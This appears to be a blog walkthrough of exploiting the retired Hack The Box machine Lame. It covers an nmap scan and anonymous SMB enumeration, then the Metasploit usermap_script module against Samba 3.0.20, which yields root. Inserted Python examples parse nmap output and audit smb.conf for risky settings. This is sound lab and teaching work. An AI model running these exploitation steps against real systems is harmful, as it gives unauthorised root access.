In this blog post, I will show the steps that I took to get root access to the Lame machine on Hack The Box (HTB).
Lame is a retired machine. This means that it is not available on HTB free servers anymore. In order to follow along, you need a VIP subscription. The monthly fee at the moment is 12 Euro.
I assume that you have already downloaded the connection pack from https://www.hackthebox.eu/home/htb/access and you are using Kali Linux version 2020.3 as the attacking machine.
Create a Connection to the HTB Network
Refer to this post of mine.
Scanning and Enumeration
Open https://www.hackthebox.eu/home/machines and write down Lame’s IPv4 address. Next to the machine name, we see Tux the penguin and thus know right away that this is a Linux machine.
The first step for this hack is to scan the Lame machine in order to identify its open ports. We run
nmap -A -T4 -p- 10.10.10.3
The result shows us that there are five open ports and four services running behind them:
- FTP (21): File Transfer Protocol. nmap shows that anonymous FTP login is allowed. This would be a finding if this were a penetration test. Anonymous FTP login should not be allowed in general. Using this information, we could connect to the machine via FTP and list the files in the FTP directory. Alternatively, we could check if vsFTPd version 2.3.4 is exploitable.
- SSH (22): Secure Shell. We could try a brute force attack on SSH. If this were a penetration test, this would show us how good the password policy is and whether the blue team is able to detect us.
- DISTCC (3632): I had to Google what DISTCC is. According to this post, this service “is designed to speed up compilation by taking advantage of unused processing power on other computers”. Here we could check whether DISTCC v1 is exploitable.
- SMB (139/445): This is the service that we targeted in our attack on the Windows machine called Legacy. nmap shows that Lame is running Samba 3.0.20-Debian. This is the service that we will target today.
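The scan above is only useful once someone reads the service banners and script output and turns them into findings. The following Python script is an added example (not code from this post or from nmap) that does exactly that triage on a constructed nmap output echoing what the post reports for Lame: it parses the port lines, attaches NSE script lines such as ftp-anon to their port, and reports the anonymous FTP login plus the vsFTPd, Samba and distcc banners the post singles out. The sample output, the watchlist messages and the SSH banner without a version are all constructed for this example.

```python
"""Triage the service lines of an nmap scan against the observations the post
makes about Lame: anonymous FTP, the vsFTPd and Samba versions and the exposed
distcc daemon. Added example for this post, not part of the original write-up."""
import re
from typing import Dict, List, Optional, Tuple

# Constructed nmap output echoing what the post reports for Lame. Only the
# versions named in the post appear; the SSH banner is left without a version.
SAMPLE_NMAP = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH
139/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1
"""

# "21/tcp   open  ftp   vsftpd 2.3.4" -> port, proto, state, service, version
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# "|_ftp-anon: Anonymous FTP login allowed" -> script name, script text
SCRIPT_LINE = re.compile(r"^\|[_ ]?([\w-]+):\s*(.*)$")

# Version banners the post singles out, with a defender's reading of each.
VERSION_WATCHLIST = [
    (re.compile(r"vsftpd 2\.3\.4", re.I),
     "vsFTPd 2.3.4: version the post flags for an exploitability check"),
    (re.compile(r"Samba smbd 3\.0\.20", re.I),
     "Samba 3.0.20: unpatched 3.0.x passes a 'username map script' login name to a shell unescaped"),
    (re.compile(r"distccd v1", re.I),
     "distcc reachable from the network: a compile helper should not be exposed to untrusted hosts"),
]


def parse_services(output: str) -> List[Dict]:
    """Return one record per open port: port, proto, service, version and the
    NSE script lines printed directly below that port."""
    services: List[Dict] = []
    current: Optional[Dict] = None
    for raw in output.splitlines():
        m = PORT_LINE.match(raw)
        if m:
            port, proto, state, service, version = m.groups()
            current = None
            if state == "open":
                current = {"port": int(port), "proto": proto, "service": service,
                           "version": version.strip(), "scripts": []}
                services.append(current)
            continue
        s = SCRIPT_LINE.match(raw)
        if s and current is not None:
            current["scripts"].append((s.group(1), s.group(2)))
    return services


def triage(output: str) -> List[Tuple[int, str]]:
    """Map the parsed scan to (port, finding) pairs a report would list."""
    findings: List[Tuple[int, str]] = []
    for svc in parse_services(output):
        for name, text in svc["scripts"]:
            if name == "ftp-anon" and "anonymous ftp login allowed" in text.lower():
                findings.append((svc["port"],
                                 "Anonymous FTP login allowed: credential-less file access, disable unless intended"))
        for pattern, message in VERSION_WATCHLIST:
            if pattern.search(svc["version"]):
                findings.append((svc["port"], message))
    return findings


if __name__ == "__main__":
    for port, message in triage(SAMPLE_NMAP):
        print(f"{port:>5}  {message}")
```

Running the script prints five findings: two for port 21 (anonymous login and the vsFTPd banner), one each for 139 and 445 (Samba 3.0.20) and one for 3632 (distcc). The watchlist is deliberately a list of regex/message pairs so that new banners can be added without touching the parser.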
Firstly, we run
smbclient -L \\\\10.10.10.3\\
The result in the screenshot tells us that we can list the share names without having a password, because anonymous login is allowed on SMB. This is a juicy finding. If we were able to get into ADMIN$, we would have very good chances of exploiting this machine. Run
Unfortunately, access to this folder is denied (same result for opt$), whereas we can get access to IPC$ but we cannot cd. The remaining folder is tmp. Here we do not get access to vmware-root, and files like vgauthsvclog.txt.0 do not contain interesting information. PS: I downloaded these files on my machine with
smbget -R smb://10.10.10.3/tmp
as cat didn't work on SMB.
Now open your browser, go to Google and search for samba 3.0.20-debian exploit. We open the Rapid7 page called usermap_script. This page explains that, using the non-default “username map script” configuration option, we can specify a username containing shell metacharacters and then execute arbitrary commands. Moreover, no authentication is needed. This is what we were looking for.
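Both SMB findings on this machine come down to settings in smb.conf: guest mapping that lets anonymous clients list shares, and the non-default “username map script” option that the Rapid7 page describes. The following Python script is an added example (not code from this post or from the Samba project) that audits a constructed smb.conf for those settings and shows the weak configuration next to a hardened one. The two configuration texts are constructed for this example; the parameter names (map to guest, username map script, guest ok, restrict anonymous, valid users) are real Samba parameters, and the script path in the weak file is a placeholder.

```python
"""Audit an smb.conf for the two settings behind the post's SMB findings.
Added example, not code from the post or from the Samba project."""
import re
from typing import Dict, List, Tuple

# Constructed smb.conf in the spirit of the weak setup described in the post.
# The script path is a placeholder, not a file from the Lame machine.
WEAK_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   security = user
   # unknown users are mapped to guest: anonymous logins can list shares
   map to guest = bad user
   # non-default option; on unpatched Samba 3.0.x the login name reaches /bin/sh
   username map script = /etc/samba/scripts/mapusers.sh

[tmp]
   path = /tmp
   guest ok = yes
   writable = yes

[opt]
   path = /opt
   guest ok = no
"""

# Constructed hardened counterpart: no guest mapping, no username map script,
# anonymous connections restricted, and the tmp share limited to a named user.
HARDENED_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   security = user
   map to guest = Never
   restrict anonymous = 2

[tmp]
   path = /tmp
   guest ok = no
   valid users = makis
"""

# "map to guest" values that turn failed logins into guest sessions.
GUEST_MAPPINGS = {"bad user", "bad password", "bad uid"}
TRUE_VALUES = {"yes", "true", "1"}


def parse_smb_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal smb.conf reader: [section] headers, 'key = value' lines, and
    full-line comments starting with '#' or ';'. Samba ignores case and
    whitespace in parameter names, so keys are normalised the same way."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][re.sub(r"\s+", "", key).lower()] = value.strip().lower()
    return sections


def audit_smb_conf(text: str) -> List[Tuple[str, str, str]]:
    """Return (section, parameter, explanation) for each risky setting found."""
    conf = parse_smb_conf(text)
    findings: List[Tuple[str, str, str]] = []
    g = conf.get("global", {})
    if "usernamemapscript" in g:
        findings.append(("global", "username map script",
                         f"set to {g['usernamemapscript']!r}: on unpatched Samba 3.0.x the "
                         "login name is passed to a shell unescaped (the usermap_script vector)"))
    if g.get("maptoguest") in GUEST_MAPPINGS:
        findings.append(("global", "map to guest",
                         f"'{g['maptoguest']}' turns failed logins into guest sessions, "
                         "so anonymous clients can list shares"))
    for name, params in conf.items():
        if name != "global" and params.get("guestok") in TRUE_VALUES:
            findings.append((name, "guest ok", "share readable without credentials"))
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_SMB_CONF), ("hardened", HARDENED_SMB_CONF)):
        print(f"== {label} ==")
        for section, param, why in audit_smb_conf(conf) or [("-", "-", "no findings")]:
            print(f"[{section}] {param}: {why}")
```

On the weak file the audit reports three findings (the username map script, the guest mapping, and the guest-readable tmp share); on the hardened file it reports none. Removing the username map script entry is the fix for the injection vector regardless of Samba version; patching Samba is what closes it when the option is genuinely needed.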
Exploit Lame and Catch the Flags
In Metasploit, enter
use exploit/multi/samba/usermap_script
set rhosts 10.10.10.3
set lhost <your tun0 IPv4 address>
Then enter
run
and cross your fingers!
We are in! We are the root user on the machine Lame. Now you just have to find the two flags for the users, makis being one of them. I leave this task as a challenge for you.
I hope you liked this post. If you have any questions, feel free to leave a comment in the comment section. Never stop learning!